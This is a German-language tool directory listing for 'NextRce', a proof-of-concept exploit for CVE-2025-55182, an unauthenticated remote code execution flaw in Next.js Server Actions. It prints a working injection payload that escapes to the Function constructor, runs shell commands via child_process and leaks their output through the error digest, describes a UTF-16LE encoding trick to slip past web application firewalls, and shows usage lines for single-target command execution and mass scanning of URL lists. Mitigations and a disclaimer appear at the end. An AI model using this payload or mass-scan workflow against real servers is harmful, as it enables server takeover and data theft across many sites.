Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques. | Kitploit
Tools/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingLearning & EducationRed TeamingPayload Development
GitHubceh-aditya-raj/cve-2025-55182

CVE-2025-55182

Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques.

2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce ist ein Sicherheitsforschungstool, das CVE-2025-55182 demonstriert, eine kritische Schwachstelle in Next.js App Router-Anwendungen, die React Server Components (RSC) und Server Actions verwenden.

Diese Schwachstelle ermöglicht es einem Angreifer, eine nicht authentifizierte Remote Code Execution (RCE) zu erreichen, indem er missbraucht, wie Next.js Server Action-Antworten verarbeitet und serialisierte RSC-Payloads auf dem Server auflöst.


🛠 Schwachstellenübersicht

CVE-2025-55182 existiert in der Next.js App Router-Architektur und kann als ein Server-seitige Objektinjektion / Prototype-Chain-Missbrauch Problem klassifiziert werden, das während der Verarbeitung von multipart/form-data-Anfragen auftritt.

Wenn eine Server Action ausgelöst wird, vertraut der Next.js-Server und deserialisiert strukturierte Client-Eingaben. Durch das Senden eines speziell präparierten Payloads kann ein Angreifer die interne Auflösungslogik manipulieren und beliebige Systembefehle in der Node.js-Laufzeitumgebung ausführen.


📌 Grundursache

Die Schwachstelle ergibt sich aus den folgenden kombinierten Faktoren:

  • Server Actions Trust Model
    Server Actions akzeptieren strukturierte Client-Payloads, die durch interne React Server Component-Auflösungslogik mit unzureichender Validierung verarbeitet werden.

  • Objektinjektion während der RSC-Auflösung
    Präparierte Payloads können JavaScript-Prototypenketten und Konstruktorreferenzen missbrauchen, um aus dem beabsichtigten Objektbereich auszubrechen.

  • Unzureichende Bereinigung
    Interne Felder wie then, _response und Formular-Daten-Getter sind nicht ausreichend gegen böswillige Manipulation geschützt.

  • Encoding-basierter WAF-Bypass
    Viele Web Application Firewalls konzentrieren sich auf UTF-8 oder Standard-JSON. Die Kodierung von Payloads als UTF-16LE ermöglicht es ihnen, die Inspektion zu umgehen, während sie vom Next.js-Server korrekt dekodiert werden.


🔬 Payload-Analyse

Der Exploit beruht auf dem Injizieren eines präparierten RSC-Payloads in eine Multipart-Anfrage.
Eine vereinfachte Version des Payloads ist unten dargestellt:

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 Exploit-Aufschlüsselung

1. Prototype Chain Hijack

  • "then": "$1:__proto__:then"
  • Dies missbraucht die JavaScript-Prototypenkette, indem die then-Eigenschaft überschrieben wird, was die Auflösung von Promises während der React Server Component-Verarbeitung in der Next.js-Laufzeitumgebung beeinträchtigt.

2. Constructor Escape

  • "_formData": { "get": "$1:constructor:constructor" }
  • Dies ermöglicht den Zugriff auf den globalen Function-Konstruktor, was die Ausführung von beliebigem JavaScript außerhalb der vorgesehenen Sandbox ermöglicht.

3. Remote Code Execution

  • process.mainModule.require('child_process').execSync('{cmd}')
  • Greift auf interne Node.js-Module zu
  • Führt beliebige Betriebssystembefehle synchron aus
  • Läuft mit denselben Berechtigungen wie der Next.js-Serverprozess

4. Digest-basierte Ausgabe-Exfiltration

  • throw Object.assign(new Error('x'), { digest: res });
  • Next.js unterdrückt detaillierte Fehlermeldungen, es sei denn, ein digest-Feld ist vorhanden.
  • Durch das Anhängen der Base64-kodierten Befehlsausgabe an die digest-Eigenschaft gibt der Server unbeabsichtigt Ausführungsergebnisse in der HTTP-Antwort zurück.

5. WAF-Bypass (UTF-16LE)

  • Der Payload kann als UTF-16LE kodiert und gesendet werden als:
  • Content-Type: text/plain; charset=utf-16le
  • Viele WAF-Engines können UTF-16LE-Inhalte nicht dekodieren und inspizieren, während der Next.js-Server sie korrekt dekodiert und verarbeitet, was die Zuverlässigkeit des Exploits erhöht.

💥 Auswirkungen

Die erfolgreiche Ausnutzung von CVE-2025-55182 kann zu Folgendem führen:

  • 🔥 Vollständige Remote Code Execution

  • 🗄️ Zugriff auf sensible Daten und Anmeldeinformationen

  • 🔗 Seitwärtsbewegung innerhalb der Infrastruktur

  • 📦 Lieferkettenkompromittierung

  • 🚨 Vollständige Serverübernahme

  • Schweregrad: Kritisch

  • Authentifizierung erforderlich: Nein

🛡 Abhilfemaßnahmen

Um sich gegen CVE-2025-55182 zu schützen:

  • Aktualisieren Sie Next.js sofort auf eine gepatchte Version
  • Deaktivieren Sie ungenutzte Server Actions
  • Erzwingen Sie eine strenge Validierung von multipart/form-data-Anfragen
  • Fügen Sie WAF-Regeln hinzu, um UTF-16LE-kodierte Payloads zu erkennen
  • Überwachen Sie abnormale Next-Action-Header und Anforderungsmuster

🚀 Verwendung

Einzelziel

  • python3 exploit.py -u https://target.com -c "whoami"

Massen-Scan mit WAF-Bypass

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ Haftungsausschluss

  • Dieses Projekt wird ausschließlich zu Bildungs-, Forschungs- und autorisierten Sicherheitstestzwecken bereitgestellt.

  • Verwenden Sie dieses Tool NICHT gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.

  • Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen